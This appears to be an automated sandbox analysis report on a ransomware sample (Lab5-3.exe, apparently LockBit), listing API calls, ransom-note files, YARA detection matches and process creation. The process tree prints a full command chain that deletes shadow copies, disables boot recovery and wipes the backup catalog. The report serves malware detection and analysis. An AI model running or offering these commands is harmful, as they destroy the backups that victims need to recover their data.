                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00406E60 NtSetInformationThread,19_2_00406E60
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_004172F0 FindNextVolumeW,malloc,malloc,GetVolumePathNamesForVolumeNameW,free,malloc,GetDriveTypeW,wsprintfW,CreateFileW,NtClose,free,19_2_004172F0
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_0040FE80 GetTickCount,RtlInitializeCriticalSection,CreateThread,CreateThread,NtSetInformationThread,NtSetInformationThread,CreateThread,NtSetInformationThread,CreateThread,NtSetInformationThread,GetLogicalDrives,GetDriveTypeW,malloc,wsprintfW,CreateThread,NtSetInformationThread,Sleep,Sleep,WaitForMultipleObjects,Sleep,RtlDeleteCriticalSection,19_2_0040FE80
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00406C90 NtSetInformationThread,19_2_00406C90
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_004180B0 GlobalFree,NtRemoveIoCompletion,WriteFile,RtlDosPathNameToNtPathName_U,malloc,NtSetInformationFile,free,NtClose,GlobalFree,GlobalFree,__allrem,NtClose,GlobalFree,GlobalFree,WriteFile,ReadFile,NtClose,GlobalFree,GlobalFree,19_2_004180B0
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00403F40 NtSetInformationThread,19_2_00403F40
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00406F50 NtSetInformationThread,19_2_00406F50
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00401370 NtSetInformationThread,19_2_00401370
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00419500 GetFileAttributesW,SetFileAttributesW,PathFindExtensionW,lstrcmpiW,CreateFileW,GlobalAlloc,wsprintfW,NtSetInformationFile,GlobalAlloc,NtQueryInformationFile,GlobalFree,GlobalFree,GlobalFree,NtClose,ReadFile,GlobalFree,GlobalFree,GlobalFree,NtClose,Sleep,Sleep,19_2_00419500
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00416B00 CreateThread,NtSetInformationThread,RegCreateKeyExA,RegDeleteValueW,RegCloseKey,wsprintfW,RegQueryValueExW,lstrcmpiW,RegSetValueExW,RegCloseKey,19_2_00416B00
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00412510 CreateThread,NtSetInformationThread,19_2_00412510
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00417F20 PathRemoveFileSpecW,wsprintfW,CreateFileW,NtSetInformationFile,NtClose,MessageBoxA,GlobalAlloc,WriteFile,GlobalFree,NtClose,19_2_00417F20
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00419330 NtCreateIoCompletion,NtSetInformationThread,CreateThread,CreateThread,NtSetInformationThread,CreateThread,NtSetInformationThread,NtSetInformationThread,NtSetInformationThread,CreateThread,19_2_00419330
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_004125C0 NtOpenProcessToken,LookupPrivilegeValueA,NtAdjustPrivilegesToken,CloseHandle,19_2_004125C0
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_0040FBF0 WNetOpenEnumW,malloc,WNetEnumResourceW,malloc,OpenThreadToken,DuplicateToken,CreateThread,NtSetInformationThread,free,WNetCloseEnum,19_2_0040FBF0
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_004127A0 GetFileAttributesW,NtOpenProcessToken,malloc,NtQueryInformationToken,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityW,SetFileSecurityW,SetFileSecurityW,CloseHandle,free,19_2_004127A0
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_0041A450 WSAStartup,malloc,RtlInitializeSListHead,RtlInitializeCriticalSection,Sleep,Sleep,RtlInterlockedFlushSList,RtlDeleteCriticalSection,WSACleanup,CreateThread,NtSetInformationThread,Sleep,RtlInterlockedFlushSList,RtlDeleteCriticalSection,WSACleanup,free,ExitThread,27_2_0041A450
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00416E10 EntryPoint,ExitProcess,RtlInitializeCriticalSection,CreateThread,CreateThread,NtSetInformationThread,NtSetInformationThread,Sleep,GetVersion,ExitProcess,ExitProcess,NtOpenProcess,GetSecurityInfo,RtlAllocateAndInitializeSid,RtlQueryInformationAcl,RtlLengthSid,malloc,RtlCreateAcl,RtlAddAccessDeniedAce,RtlGetAce,RtlGetAce,RtlAddAce,SetSecurityInfo,free,CreateThread,NtSetInformationThread,NtClose,RtlFreeSid,NtSetInformationProcess,RtlAdjustPrivilege,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,CreateThread,NtSetInformationThread,CreateThread,NtSetInformationThread,ExitProcess,GetTickCount,GetTickCount,GetTickCount,GetConsoleWindow,IsWindowVisible,NtWaitForSingleObject,ExitProcess,27_2_00416E10
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_004172F0 FindNextVolumeW,malloc,malloc,GetVolumePathNamesForVolumeNameW,free,malloc,GetDriveTypeW,wsprintfW,CreateFileW,NtClose,free,27_2_004172F0
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_0040FE80 GetTickCount,RtlInitializeCriticalSection,CreateThread,CreateThread,NtSetInformationThread,NtSetInformationThread,CreateThread,NtSetInformationThread,CreateThread,NtSetInformationThread,GetLogicalDrives,GetDriveTypeW,malloc,wsprintfW,CreateThread,NtSetInformationThread,Sleep,Sleep,WaitForMultipleObjects,Sleep,RtlDeleteCriticalSection,27_2_0040FE80
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00417880 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,NtOpenFile,GetProcAddress,GetProcAddress,malloc,NtQuerySystemInformation,CharLowerBuffW,free,27_2_00417880
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_004180B0 GlobalFree,NtRemoveIoCompletion,WriteFile,RtlDosPathNameToNtPathName_U,malloc,NtSetInformationFile,free,NtClose,GlobalFree,GlobalFree,__allrem,NtClose,GlobalFree,GlobalFree,WriteFile,ReadFile,NtClose,GlobalFree,GlobalFree,27_2_004180B0
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00419500 GetFileAttributesW,SetFileAttributesW,PathFindExtensionW,lstrcmpiW,CreateFileW,GlobalAlloc,wsprintfW,NtSetInformationFile,GlobalAlloc,NtQueryInformationFile,GlobalFree,GlobalFree,GlobalFree,NtClose,ReadFile,GlobalFree,GlobalFree,GlobalFree,NtClose,Sleep,Sleep,27_2_00419500
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00416B00 CreateThread,NtSetInformationThread,RegCreateKeyExA,RegDeleteValueW,RegCloseKey,wsprintfW,RegQueryValueExW,lstrcmpiW,RegSetValueExW,RegCloseKey,27_2_00416B00
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00417F20 PathRemoveFileSpecW,wsprintfW,CreateFileW,NtSetInformationFile,NtClose,MessageBoxA,GlobalAlloc,WriteFile,GlobalFree,NtClose,27_2_00417F20
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00419330 NtCreateIoCompletion,NtSetInformationThread,CreateThread,CreateThread,NtSetInformationThread,CreateThread,NtSetInformationThread,NtSetInformationThread,NtSetInformationThread,CreateThread,27_2_00419330
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_004125C0 NtOpenProcessToken,LookupPrivilegeValueA,NtAdjustPrivilegesToken,FindCloseChangeNotification,27_2_004125C0
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_0040FBF0 WNetOpenEnumW,malloc,WNetEnumResourceW,malloc,OpenThreadToken,DuplicateToken,CreateThread,NtSetInformationThread,free,WNetCloseEnum,27_2_0040FBF0
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_004127A0 GetFileAttributesW,NtOpenProcessToken,malloc,NtQueryInformationToken,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityW,SetFileSecurityW,SetFileSecurityW,CloseHandle,free,27_2_004127A0
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00406C40 NtSetInformationThread,27_2_00406C40
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00406E60 NtSetInformationThread,27_2_00406E60
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_0041A8E0 CreateThread,NtSetInformationThread,NtAllocateVirtualMemory,GetWindowsDirectoryW,RtlAcquirePebLock,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,RtlReleasePebLock,LdrEnumerateLoadedModules,27_2_0041A8E0
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00412680 NtSetInformationThread,NtOpenProcessToken,CreateWellKnownSid,CheckTokenMembership,NtQueryInformationToken,CheckTokenMembership,CloseHandle,CloseHandle,CloseHandle,27_2_00412680
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00406C90 NtSetInformationThread,27_2_00406C90
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00403F40 NtSetInformationThread,27_2_00403F40
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_0041A740 CreateThread,NtSetInformationThread,CoInitializeEx,CoUninitialize,27_2_0041A740
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00406F50 NtSetInformationThread,27_2_00406F50
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00401370 NtSetInformationThread,27_2_00401370
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00412510 CreateThread,NtSetInformationThread,27_2_00412510
                      Source: C:\Windows\System32\wbadmin.exeFile created: C:\Windows\Logs\WindowsBackup
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_0040764019_2_00407640
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_0040704019_2_00407040
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_0040724019_2_00407240
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00411E4019_2_00411E40
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00406E6019_2_00406E60
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_0040167019_2_00401670
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00402E1019_2_00402E10
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_0041862019_2_00418620
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_0040E03019_2_0040E030
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_004024C019_2_004024C0
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_0040FE8019_2_0040FE80
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_0041788019_2_00417880
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_0040409019_2_00404090
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00401A9019_2_00401A90
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00408AA019_2_00408AA0
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_004042A019_2_004042A0
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_0040194019_2_00401940
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00406F5019_2_00406F50
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_0040F37019_2_0040F370
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00406D7019_2_00406D70
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_0041017019_2_00410170
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_0040751019_2_00407510
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00407B2019_2_00407B20
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_0040953019_2_00409530
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_0041A13019_2_0041A130
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00419D3019_2_00419D30
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_0040C7E019_2_0040C7E0
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_004053E019_2_004053E0
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00404DF019_2_00404DF0
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_0040E98019_2_0040E980
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00408FA019_2_00408FA0
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_0041862027_2_00418620
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_0040FE8027_2_0040FE80
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_0041788027_2_00417880
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_0041017027_2_00410170
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00419D3027_2_00419D30
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_0041A13027_2_0041A130
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_0040764027_2_00407640
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_0040704027_2_00407040
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_0040724027_2_00407240
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00411E4027_2_00411E40
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00406E6027_2_00406E60
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_0040167027_2_00401670
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00402E1027_2_00402E10
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_0040E03027_2_0040E030
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_004024C027_2_004024C0
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_0040409027_2_00404090
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00401A9027_2_00401A90
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00408AA027_2_00408AA0
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_004042A027_2_004042A0
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_0040194027_2_00401940
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00406F5027_2_00406F50
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_0040F37027_2_0040F370
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00406D7027_2_00406D70
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_0040751027_2_00407510
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00407B2027_2_00407B20
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_0040953027_2_00409530
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_0040C7E027_2_0040C7E0
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_004053E027_2_004053E0
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00404DF027_2_00404DF0
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_0040E98027_2_0040E980
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 27_2_00408FA027_2_00408FA0
                      Source: C:\Windows\System32\wbengine.exeProcess token adjusted: Security
                      Source: Lab5-3.exe, 0000001B.00000003.1867495283.0000000018550000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs Lab5-3.exe
                      Source: Lab5-3.exe, 0000001B.00000003.1835720971.0000000018550000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs Lab5-3.exe
                      Source: Lab5-3.exe, 0000001B.00000003.2122488280.000000001C330000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameReadOutLoud.apiD vs Lab5-3.exe
                      Source: Lab5-3.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Lab5-3.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: Lab5-3.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICOUS_EXE_References_VEEAM description = Detects executables containing many references to VEEAM. Observed in ransomware
                      Source: 0.0.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0.0.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICOUS_EXE_References_VEEAM description = Detects executables containing many references to VEEAM. Observed in ransomware
                      Source: 34.2.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 34.2.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICOUS_EXE_References_VEEAM description = Detects executables containing many references to VEEAM. Observed in ransomware
                      Source: 27.2.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 27.2.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICOUS_EXE_References_VEEAM description = Detects executables containing many references to VEEAM. Observed in ransomware
                      Source: 40.2.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 40.2.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICOUS_EXE_References_VEEAM description = Detects executables containing many references to VEEAM. Observed in ransomware
                      Source: 40.0.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 40.0.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICOUS_EXE_References_VEEAM description = Detects executables containing many references to VEEAM. Observed in ransomware
                      Source: 34.0.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 34.0.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICOUS_EXE_References_VEEAM description = Detects executables containing many references to VEEAM. Observed in ransomware
                      Source: 19.0.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 19.0.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICOUS_EXE_References_VEEAM description = Detects executables containing many references to VEEAM. Observed in ransomware
                      Source: 27.0.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 27.0.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICOUS_EXE_References_VEEAM description = Detects executables containing many references to VEEAM. Observed in ransomware
                      Source: 19.2.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 19.2.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICOUS_EXE_References_VEEAM description = Detects executables containing many references to VEEAM. Observed in ransomware
                      Source: Lab5-3.exe, 00000028.00000003.3174022235.000000001A02B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: F.vbp
                      Source: classification engineClassification label: mal100.rans.spre.expl.evad.winEXE@170/2848@4/100
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00410170 NetApiBufferFree,RtlEnterCriticalSection,lstrcmpiW,lstrcmpiW,wsprintfW,wsprintfW,FindFirstFileExW,RtlLeaveCriticalSection,ExitThread,FindClose,wsprintfW,CreateFileW,RtlLeaveCriticalSection,ExitThread,malloc,RtlLeaveCriticalSection,SHEmptyRecycleBinW,GetDiskFreeSpaceExW,SetThreadUILanguage,StrFormatByteSize64A,StrFormatByteSize64A,StrFormatByteSize64A,wsprintfA,CloseHandle,DeleteFileW,ExitThread,19_2_00410170
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00416710 CreateToolhelp32Snapshot,CloseHandle,Process32First,GetCurrentProcessId,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,GetCurrentProcessId,OpenProcess,TerminateProcess,CloseHandle,19_2_00416710
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-si\Restore-My-Files.txtJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:11840:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:12132:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9464:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:12016:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:11944:120:WilError_03
                      Source: C:\Users\user\Desktop\Lab5-3.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{BEF590BE-11A6-442A-A85B-656C1081E04C}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9380:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2316:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9840:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:12216:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:11108:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:11796:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8708:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9728:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5024:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:12080:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8804:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:11852:120:WilError_03
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Documents and Settings\user\Local Settings\Temp\Restore-My-Files.txtJump to behavior
                      Source: Lab5-3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile read: C:\$RECYCLE.BIN\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: wctF86A.tmp.lockbit.0.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: wctF86A.tmp.lockbit.0.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: wctF86A.tmp.lockbit.0.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: wctF86A.tmp.lockbit.0.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: Lab5-3.exeReversingLabs: Detection: 96%
                      Source: unknownProcess created: C:\Users\user\Desktop\Lab5-3.exe "C:\Users\user\Desktop\Lab5-3.exe"
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
                      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://%3cfnc1%3e(79)/
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1996,i,10208007017991637576,12589176499533245041,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
                      Source: unknownProcess created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
                      Source: unknownProcess created: C:\Windows\System32\vdsldr.exe C:\Windows\System32\vdsldr.exe -Embedding
                      Source: unknownProcess created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
                      Source: unknownProcess created: C:\Users\user\Desktop\Lab5-3.exe "C:\Users\user\Desktop\Lab5-3.exe"
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\Desktop\Lab5-3.exe "C:\Users\user\Desktop\Lab5-3.exe"
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
